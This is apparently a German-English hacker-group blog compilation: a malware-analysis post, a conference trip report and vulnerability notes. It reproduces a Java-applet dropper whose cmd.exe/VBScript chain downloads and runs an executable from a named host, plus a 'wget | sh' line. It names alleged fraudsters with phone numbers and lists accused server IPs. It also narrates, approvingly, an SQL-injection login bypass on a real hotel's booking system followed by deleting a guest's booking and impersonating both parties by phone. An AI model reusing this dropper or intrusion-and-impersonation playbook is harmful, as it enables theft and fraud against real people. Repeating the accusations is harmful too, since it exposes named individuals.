Received:
by 10.87.50.6 with SMTP id c6mr6863154fgk.41.1273379108490;
Sat, 08 May 2010 21:25:08 -0700 (PDT)

Return-Path:
<unnex@server54.2×4.ru>

Received:
from sendmail.2×4.ru (sendmail.2×4.ru [193.107.16.26])
by mx.google.com with ESMTP id b17si7079620fka.13.2010.05.08.21.25.08;
Sat, 08 May 2010 21:25:08 -0700 (PDT)

Received-SPF:
pass (google.com: domain of unnex@server54.2×4.ru designates 193.107.16.26 as permitted sender) client-ip=193.107.16.26;

Authentication-Results:
mx.google.com; spf=pass (google.com: domain of unnex@server54.2×4.ru designates 193.107.16.26 as permitted sender)
smtp.mail=unnex@server54.2×4.ru

Received:
from server54.2×4.ru (unknown [92.241.169.14])
by sendmail.2×4.ru (Postfix) with ESMTP id AA65D134DDD3
for <******@gmail.com>; Sun,  9 May 2010 08:25:33 +0400 (MSD)

Received:
by server54.2×4.ru (Postfix, from userid 1070)
id 31FF213851CA; Sun,  9 May 2010 08:11:11 +0400 (MSD)

To: ******@gmail.com

Subject: Top Secret
From: 1337-crew@info.2×4.ru
Message-Id: <20100509041111.31FF213851CA@server54.2×4.ru>
Date: Sun,  9 May 2010 08:11:11 +0400 (MSD)

Nicht draufklicken! Top Secret – Versenden!
http://testtest1.u2m.ru/skynetfud.EXE (Barracuda Bot)

GreetZ 13Speedtest37

My first step was to scan the file with a up2date anti-virus program. I used Kaspersky 2010 and i  found out it is undetected.

Okey after that i checked out some of the servers around and found the infection routine is an Applet as “.jar”. Victims get infected by a vulnerability which affected the last  Java Runtime Environment. The victim gets infected over a website or malicious mails. The owner of the criminal network controls all the servers with a web interface. An analyst could break into the web interface through different vulnerabilities inside of the russian botnet application.

</applet>
<applet width=’1′ height=’1′ code=’Update.class’ archive=’Slide.jar’>
<param name=’windows1′ value=’cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = “ADODB” >> %temp%\winconfig.vbs & echo A = “.Stream” >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject(“WinHttp.WinHttpRequest.5.1″) >> %temp%\winconfig.vbs & echo Http.Open “GET”, URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject(“WScript.Shell“) >> %temp%\winconfig.vbs & echo shell.Run “%temp%\update.exe” >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs http://testtest1.u2m.ru/skynetfud.EXE %temp%\update.exe’>
<param name=’windows2′ value=”>
<param name=’unix1′ value=”">
<param name=’unix2′ value=”">
<param name=’linux1′ value=”wget http://sh-lin.sh -O- | sh”>
<param name=’linux2′ value=”">
</applet>

… get complete request details

Barracuda URL:

http://info.2×4.ru/

http://testtest1.u2m.ru

Hoster & background of the criminal activities is the following isp  …

http://www.2×4.ru/index.php

File + RAW & HEX:

http://rapidshare.com/files/385318974/barracuda-skynet_ud.rar.html

http://www.file-upload.net/download-2502919/barracuda-skynet_ud.rar.html

Infection Methods:

Infection Site:
http://celite.in/top/   => code=’Update.class’ archive=’Slide.jar’>     <= DANGER!
http://testtest1.u2m.ru/skynetfud.EXE     <= DANGER!

When you follow the leads to the source, you find a lot steps which end up at http://testtest1.u2m.ru/  on this site is a developer site of a coder and guy who lives mostly in the night  … Alexander M.! From his website you can find leads in the search results of google in some old 1337 threads through russia. After i noticed this i went to an old specific Members of 1337cr3w and asked for Alexander M.  … the following discussion was logged by a anonymous Guest.

09/05/2010 15:20:08 ‹guest662› kennt einer von euch den hier
09/05/2010 15:20:08 ‹guest662› http://www.outro.ru/
09/05/2010 15:20:41 ‹FL00› alex maldsev?
09/05/2010 15:20:47 * guest374 quit (timeout)
09/05/2010 15:20:55 ‹guest374› jop
09/05/2010 15:21:00 ‹FL00› warum?
09/05/2010 15:21:11 ‹guest662› ja oder nein … nix schlimmes
09/05/2010 15:21:23 ‹FL00› vllt…
09/05/2010 15:21:42 * FL00 changes nickname to guest000
09/05/2010 15:22:13 ‹guest662› der macht coole sachen
09/05/2010 15:22:29 ‹guest662› kenne den von früher da hat er viel mit hosting usw. gemacht
09/05/2010 15:22:33 * guest92 joins My room
09/05/2010 15:22:38 ‹guest662› woher kennst du ihn ?
09/05/2010 15:22:48 ‹guest92› welcher huso versendet hier die Viren via Mail?
09/05/2010 15:25:13 ‹guest82› der ist noch im alten Team

In the Logs you can read that these people know the guy behind that Russian website. On our next thread about the barracuda botnet we will explain how to hack into the botnet control application. This posts just shows how criminals are again working on a new and structured botnet for the future.

[Writer: ~X4lt & ~Rem0ve]

The following servers are destructive russian hacking/fraud & spam servers out of a network. Up2Date & Active  ;)

83.222.127.80
83.222.127.54
83.222.125.245

212.115.225.38
212.124.112.35

83.12.51.2
221.132.46.2
207.194.87.105
89.248.172.14
217.20.127.197
109.108.62.147
78.227.126.169
217.29.30.20
78.173.16.71
213.167.197.160
94.76.87.154
89.28.3.241
77.27.27.65
89.208.121.35
62.122.211.4
165.65.69.130
190.54.16.184
212.115.225.20
62.1.110.245
213.149.222.230
195.113.185.4
174.129.5.87
82.224.232.175
213.217.58.18
194.71.15.242
173.203.206.253
212.76.127.132
203.172.248.29
212.124.112.109
85.214.150.97
124.42.10.119
195.70.55.151
200.238.83.49
200.78.224.77
61.244.235.34
79.98.31.191
86.103.239.44
62.141.50.119
213.167.197.160
219.150.168.70
193.87.173.106
194.44.166.172
220.181.66.163
94.142.131.181
95.28.85.202
125.234.1.98
203.199.50.19
89.28.3.241
125.160.76.84
187.9.11.187
87.106.177.76
88.201.1.220

On my way through the russian nets i found different high criminal activities around carding fraud & how they do there payments. The following bank accounts & phone numbers are used by high criminal russian & east carder/fraud groups …

First name: Ognjen
Last name : Miric
City: Sarajevo
Country: Bosnia and Herzegovina
Zip: 71000
Phone:+38763136888

Name: Mihalache ioan Lucian
City: iasi
Country: Romania
Phone Number: +40742169390
Bank: Western Union
IBN: RO42****

The most of the servers are used for daily fraud, malware attacks & spam by different famous russian carder/fraud crews out of the not legal payment scene. The phone numbers are for communication between the seller & buyer through different countries. The Bank accounts are given out by a “unknown” ^^ insider on western union to transfer the payments of  “customers”.

[Writer: ~Rem0ve]

The following 2 pictures show some crashs around the vulnerability on the software client …

Overview on WinDBG – ECX & EIP overwwritten …

Watch the movie below to learn how to analyze a windows program. Here can you download(high quality) or view(flash) the analyses video with the software & a debugger. The video is produced by rem0ve for hacking-lab on published by ivan bütler …

View: FTPRush Z0D Buffer Overflow or http://media.hacking-lab.com/movies/ftprush/(Flash)

Download: http://media.hacking-lab.com/largefiles/ftprush-stack-overflow3.wmv (WMV)

ADV:http://hacking-lab.com/news/newspage/buffer-overflow-vulnerability-on-ftprush.html

The Software allows the attacker to get a 1A local/remote PoC  as . xml or rfq for transfer queue. The complete advisory got published after the vendor fixed the overflow issue in a stable update.

View the History to see upcoming issues …

http://www.ftprush.com/product-ftprush-history.html

[Writer: ~x4lt]

1. (SQL/RFI) Freundliche Übernahme, des Buchungssystems von Hotel **********

Auf der Internetseite des Hotel gab es ein Kundenbuchungsystem. In diesem Buchungssystem konnte man von außen nur sehen welche Zimmer wann reserviert waren. Glücklicherweise war im Source ein Link zu dem Application Login. Nach dem ich dort angekommen war habe ich es mit einfachen Tricks wie ‘or 1=1– versucht einen Auth Bypass zu machen. Siehe da “Wilkommen im Buchungssystem — Herr ****”.

2. (DatenBank) Löschen – Einträg mit der Buchung für 27.12-30.12 vom 26.12 18.00

In dem System konnte man schön alles bearbeiten & verändern wie man es brauchte als Admin. Also wurden die 2 letzten zwei Einträge aufgenommen.

3. (Social-Engeneering) Anruf bei dem Kunden mit der Buchung & Absage

Nun musste man versuchen über die Kontaktnummer, die Person welche vor 2 stunden gebucht hatte für den 27.-30.12. umleiten & so ein freies Zimmer an dem Tag zu bekommen. Also rief ich dort an im Namen des Hoteinhabers den ich aus der DB hatte & habe so den Kunden freundlich auf ein anderes Hotel umgeleitet. Dieser war sehr freundlich und verständisvoll & hat sich einfach ein anderes Hotel gesucht.

4. (Social-Engeneering) Anruf beim Hotelbesitzer (Kunde) & Umbuchung

Damit nun der ganze scheiss nicht auffliegt habe ich dann einfach im Namen der Person angerufen welche die Buchung gemacht hat & habe die Reservierung  umgeschrieben auf K*******. Der Hotelbesitzer hat mich zur Verifizierung nach der Adresse gefragt … die ich schnell aus der Datenbank nochmal aufrufen mussten.

5. Lets go to … 26c3 Berlin

Schon war alles umgebucht & da ich mir sehr sicher war, dass alles bis zum Ende klappt bin ich mit zwei anderen losgefahren.

Tag 1:

Nach diesem kombinierten Hack war das einize Problem noch, ob wir mit dieser Aktion überhaupt durch kommen. Kurz vor dem Einbuchen in   die Ferienwohnung haben wir schon ein wenig kernel-panic gehabt, weil wir nicht wussten ob es auch alles so klappt wie wir es uns ausgemalt hatten. Glücklicherweise hat alles geklappt und wir haben den Hotelbesitzer sogar über die kritischen Sicherheitslücken bestens informiert(patched/fixed). Danach hat er uns von seiner Lochkarten skills (70-80′er) & Server-Farm erzählt + uns das Passwort zum Router genannt. War echt lustig, dafür dürfen ab jetzt jedes Mal zu den Chaos Events in Berlin kostenlos übernachten.

Nachdem alles mit dem Hotel geklappt hatte mussten wir nur noch zur 26c3 (BBC|Alexanderplatz) hinfahren.

Dort angekommen haben wir schon gleich die ersten Freunde getroffen wie Ben “ausm CCC Gießen”, der wirklich einer der besten Helfer & Informationsverbreiter dort war. Immer wenn wir irgendwas technisch oder organisatorisches hatten konnten wir uns auf diesen Kollegen doppelt so gut verlassen. Ben musste aber spontan frühzeitig los weil er einen Wasserrohrbruch im Haus hatte & der Untermieter schon schwimmen konnte.

Nachdem wir am ersten Tag dort kaum Plätze gefunden haben mussten wir uns am Tisch der Porno leechenden Mannheimer vom CCC niederlassen. Kurze Zeit später wurde es immer lustiger & komischerweise saßen plötzlich alle richtigen Nerds hinten an einem Tisch zusammen, nachdem die ersten schlafen waren. Besonders zu erwähnen ist der Hacker “Fauli aka BABBAGE” aus Österreich …

Kurz später kamen dann Hoohead, Padawan, SkskilL & Snag(krank) dazu …

Glücklicherweise haben wir noch 2 richtig coole Nerds aus München getroffen die “Ben & Ash” heißen und mit uns dann zusammen so viel Party Spaß hatten. Diese 3 Personen waren echt richtig gute und ehrliche Leute mit denen man feiern und basteln konnte. Was ich auch super lustig fand im Hackcenter, dass ein blonder nicht CCCler gegenüber als versucht hat nazi-sites(flirt) zu bashen und laut geprahlt hat während wir ihn gerootet haben … als ausgleichende Gerechtigkeit für alle Flamer(Heise.de/Golem.de/Ubuntu-Users) die sich über die bösen Cracker dort beschweren. Elektronische Gerechtigkeit kann man nicht aufhalten & trifft immer den/die Richtigen. *Duck

Von 16.00-17.00 Uhr kamen dann die Leute mit den kleinen mobilen Drohnen auf dem Platz vor dem CCC zum Vorschein. Die Kunststücke waren alle sehr gut & vor allem präzise navigiert. Allein die Navigation, der Fluggeräte ist sowas von präzise, dass man mit der Drohne wenige Meter vor Personen schweben kann ohne diesen zu Nahe zu kommen. Sehen kann man das auf einigen Videos besonders gut …

Demonstration -  Priv Video (Sound Off/Music On)
Link: Download

Oktocopter

Skynet

MicroCopter – Indoor Fly

Chaos Familien Duell – Quiz

Wer Abends zu dem Hacker-Quiz kam, wurde mit lachenden Tränen belohnt.

C-Base Berlin

Am Abend waren wir dann in der C-Base wo man grundsätzlich nur friedlichen & guten Spaß haben kann. Die Party war sehr geil und es kam bester “Electro”. Ash hat nach einem kurzen Break-Dance Battle vor der Tür (HIPHOP) dann doch den Weg rein gefunden. Mein absolutes oldschool High-light mit backflash in die Kindheit war der GoldenAxe Spielautomat der hinten am Eingang(c-base) stand. Wenn es nur irgendwas gibt was an dem Abend “epic” war dann dieser Spielautomat.

Tag2:

Doc Schneider der vom CCC Gießen kommt war ein wirklich lustiger Zimmerpartner weil wir immer was zu lachen hatten und total verplant den zweiten Tag in Berlin rumgejungelt sind. Komischerweise war er schon um 11 Uhr Mittags fit(Unglaublich!) wo ich gerade noch mit Alice vom Tag davor in meinen träumen getanzt habe. Um 14 Uhr war auch ich dann wieder im Center für Nerds unterwegs und habe mir erstemal einen fetten Platz in der Lounge neben der Theke gesichert. Ja ich weiss da war kein Platz aber wir haben da einfach welchen gemacht … bei uns gabs kostenlose & frische Früchte(Türke ums Eck), gute Hacks, nette Leute auf Club Mate & ne menge anderer coffeingeschädigter Seelen. Also mir persönlich hat das Zeug nicht so gut geschmeckt, die anderen haben das Zeug aber literweise gekippt haben.

Über die Tage hinweg haben wir eine Menge Vorträge und Shows gesehen die uns alle mehr als nur beeindruckt haben. Einen Fahrplan hatten wir ja schon über das Wiki bekommen wo für uns alle wichtigen Vorträge & Workshops verzeichnet waren.

Dragon FahrPlan: http://events.ccc.de/congress/2009/Fahrplan/track/Hacking/index.en.html

Die besten Vorträge …

Blackbox JTAG Reverse Engineering
Black Ops Of PKI
Fuzzing the Phone in your Phone
DECT (I-III)
Playing with the GSM RF Interface
Reverse-Engineering DisplayLink devices
Here Be Electric Dragons
GSM: SRSLY?
A Hacker’s Utopia
Cybernetic Cannibalism
Defending the Poor

LaserShow im BBC

26C3 Tesla Coil – Ghostbusters

Das folgende Video hat uns allen sehr gut gefallen. Wir werden eure Projekte weiter gespannt verfolgen.

Wir haben aber auch selber noch ein Bild aus unserem Archiv …

Lego Sumo – All Bots @ One Table

Electronic Equipment

Dunkin Donut – Denial of Service Vulnerability
Wisst ihr bis vor wenigen Tagen haben wir alle noch gedacht, dass eine Denial of Service Attacke immer große Schäden verursacht. Schönerweise konnte man sich hier vom lustigen aber friedlichen Leuten dazu einladen lassen Abends den Dunkin Donut Laden am Alexanderplatz zu stürmen. Alles hat damit angefangen das eine einzelne Person im Hack-Center “Dunkin Donuts” gebrüllt hat, wenige Sekunden später sind wir und alle um uns rum aufgestanden und haben eine nette “koordinierte” DoS Attacke gezogen welchen jedem dort einen mega Spaß gebracht hat, vom Mitarbeiter bis zum Endverbraucher.

Nach der Human DoS Attacke wo alle natürlich gestärkt zurück kamen ging der Abend erst so richtig los. Nachts haben sich die besten Sec-Nerds ausgetobt, was man an den Uploads übers Netzwerk sehen konnte. Das folgende Video wurde am 29. im Event Wiki verlinkt & ist seit 2 Tagen auf Youtube/AOL verlinkt. Wo es her kommt weiss bisher keiner aber ich persönlich fand es ganz ergänzent zu den News auf Heise/Golem.

Einige Hack Drops gingen von anderen über das Wiki Page raus was man alle 30mins sehen konnte, darunter der Server der Bild-Zeitung, BVG & verschiedenste radikale Webseiten wie lokale NPD Räucherbuden.

http://events.ccc.de/congress/2009/wiki/Hacked/Targets

Ich persönlich bin ja auch gegen schädigende Angriffe & Hacks aber irgendwie tun die Typen ja auch was für die Allgemeinheit. Einen Hack aus dem Archiv fand ich besonders lustig und zwar ging der in Richtung “SVP Stadt Zuerich” wo sogar heute noch im obersten TOPIC “26c3- Here be Dragons” steht. http://www.svp-stadt-zuerich.ch/

Am besten man guckt sich das einfach an und denkt sich seinen Teil dazu. Lustig fand ich, dass die Leute, der SVP nicht mal in der Lage waren aus der Webseite den Titel zu entfernen. Was man an dem folgenden Suchmaschineneintrag sehen kann …

Später in der Nacht ging es im Netzwerk erst so richtig los mit DNS Attacken, Spoofing, Sniffing, Privileg Escalations & Co. Was da manchmal an Checksum zurück kam war ja fast schon peinlich. Besonders sollten sich einige “Netzwerk Cracker” das Wort MSF-Framework einprägen. Wenn man anderen was unterschieben möchte sollte man wenigstens den Dateiname richtig schreiben. Nachdem wir das W-Lan dann einmal kurz sanft unterbrochen haben gings dann aber viel besser.

Tag 3

Am Morgen habe ich mir nochmal genauer angeschaut wie Zensursula WarGame funktioniert da ich denke es wäre eine echte Bereicherung für das Hacking-Lab. Bei Zensursula geht es darum eine kleine konfigurierte Blackbox über 3 Ebenen hinweg zu penetrieren um den Content trotzdem durch den Filter zu bekommen. Ich wollte es versuchen diese Challenge komplett zu meistern leider war es für mich nur noch 1′ne Stunde bis zur Rückfahrt/Abfahrt. Wer genaueres erfahren möchte kann sich den folgenden link anschauen. http://events.ccc.de/congress/2009/wiki/Zensursulas_Blackbox

CCC – Book of Records ?

Am Rande des Chaos Congress wurden 11k(11.000) Club Mate Getränke verzehrt. Club Mate ist eine nicht alkoholische Brause in Form eines sehr leckeren coffeinhaltigen Getränks. Ein weiterer Rekord wurde im Bereich Downloading aufgestellt. Insgesamt waren es 123 Terabyte verschifft worden wie das NOC berichtete. Ein weiterer Rekord wurde bei den Besucherzahlen aufgestellt die bei ca. 9000 lagen.

Wanted: 1 Kasten Club Mate?

Wer die Identität der Person(oben links) kennt, soll sich bei Hoohead melden & bekommt einen Kasten Club Mate.

Party (Doc_Snyder)

Download till Death …

Der öffentliche FTP ist per HTTP anonym erreichbar. Viel Spaß beim runterladen der Video wir haben schon alles … ftp.ccc.de/congress/26c3

Was hat gefehlt ?!

Nachdem wir 100 Leute gefragt haben was den so  wirklich gefehlt hat auf der 26c3, haben …

45 Personen haben mit  “die Sitzplätze” geantwortet

27 waren für mehr “Tagestickets”

23 haben beantwortet mit “Capture the Flag (CTF)”

5 haben auf noch eine Dunkin Donut DoS Attacke bestanden

Was hätte fehlen können?!
Die Porno leechenden Mannheimer die sich so fett gemacht haben ^^. Der “mutige” Grayhat, der Fotos von uns im Hack-Center machen wollte. Der möchtegern Flirt Homepage Hacker & der unübertroffene Wasserrohrbruch in Ben’s Haus.

Greetz: Ben(CCC-Gießen), Fauli(AT), Ash & Ben (Muenchen), X4lt, Doc_Snyder, Hoo, Padawan, ric0, skskilL, snag(ck), Hotelbesitzer.

[Writer: annon1]

The goal to beat the high challenge is to find a Z0D vulnerability in the Prism software of Mozilla.

Product URL: https://mozillalabs.com/prism/
Download URL: http://prism.mozilla.com/started/

Ever when we start to audit software like that, we first test the restricted string-size of inputs. This attack is one of the most basic methods to overflow with inserted over-sized(large) strings like URL’s or Words. After we tested the restriction string-size of the URL/Name GE-TEAM discovers a stack buffer-overflow vulnerability for Prism v1.0b2 mozilla application + FireFox addon.

Affected Versions:
Prism – STANDALONE APPLICATION (v1.0b2)
Prism Firefox Extension – FIREFOX ADDON (v1.0b2)

Windows Vista BEX(Overflow) Error Message on Prism Addon Firefox …

Problemereignisame:    BEX
Anwendungsname:        firefox.exe
Anwendungsversion:    1.9.1.3593
Anwendungszeitstempel:    4aef8082
Fehlermodulname:    StackHash_0c1c
Fehlermodulversion:    0.0.0.0
Fehlermodulzeitstempel:    00000000
Ausnahmeoffset:        41414141
Ausnahmecode:        c0000005
Ausnahmedaten:        00000008
Betriebsystemversion:    6.0.6002.2.2.0.768.3
Gebietsschema-ID:    1031
Zusatzinformation 1:    0c1c
Zusatzinformation 2:    02e5e7938cbdf4517280afd626c56a15
Zusatzinformation 3:    4f6a
Zusatzinformation 4:    e8605fe6e21ad013004e473d591fd489

Windows Vista BEX(Overflow) Error Message on Prism Application(STANDALONE)

Problemereignisame:    BEX
Anwendungsname:        prism.exe
Anwendungsversion:    1.9.2.3477
Anwendungszeitstempel:    4a565337
Fehlermodulname:    MOZCRT19.dll
Fehlermodulversion:    8.0.0.0
Fehlermodulzeitstempel:    4a542beb
Ausnahmecode:        c0000005
Ausnahmeoffset:        0001838a
Betriebsystemversion:    6.0.6002.2.2.0.768.3
Gebietsschema-ID:    1031
Zusatzinformation 1:    0ae2
Zusatzinformation 2:    a1f9523330457d36593f6e0b3438b757
Zusatzinformation 3:    677b
Zusatzinformation 4:    e391b47c6bb6b6f2db80d1a37eb89949

… now a reproduced errors with AAAAA…+ by Windows Vista BEX(Overflow) Error Message on Prism Application(STANDALONE)

Problemereignisname:        BEX
Anwendungsname:        prism.exe
Anwendungsversion:        1.9.0.3405
Anwendungszeitstempel:    49f89f9d
Fehlermodulname:        StackHash_1477
Fehlermodulversion:        0.0.0.0
Fehlermodulzeitstempel:    00000000
Ausnahmeoffset:        00414141
Ausnahmecode:            c0000005
Ausnahmedaten:        00000008
Betriebsystemversion:        6.0.6002.2.2.0.768.3
Gebietsschema-ID:        1031
Zusatzinformation 1:        1477
Zusatzinformation 2:        528bb57b980c1da9bf8c456a3876b4b2
Zusatzinformation 3:        22f3
Zusatzinformation 4:        05475e8449807bb817c3945e60bda828

Due to the lack of the unrestricted URL/Name size it is possible for attackers to get the privileges of the running process. The risk of the vulnerability is estimated as high. The vulnerability is reported to Mozilla Developer-Team & verified + analysed over Compass Security. We produced a video about the verification of the vulnerability & some low views around the test start …

Startup: 2009-06-13
Verified: 03.12.2009
Challenge: Hacking Secure Browser | Mozilla Prism
Lab URL: https://www.hacking-lab.com/ranking/event.html?eventid=43

We produced a little video about the vulnerability & some low views around the restricted input tests + errors … click the picture to view the a part of the test video …

The vulnerability is reported & not published via advisory because of fix/patch status. The Full advisory follows in this posting next weeks. We wish all readers, partners & nerds happy x-mas & a good h4ck in the new year 2010.

[Writer: ~remove]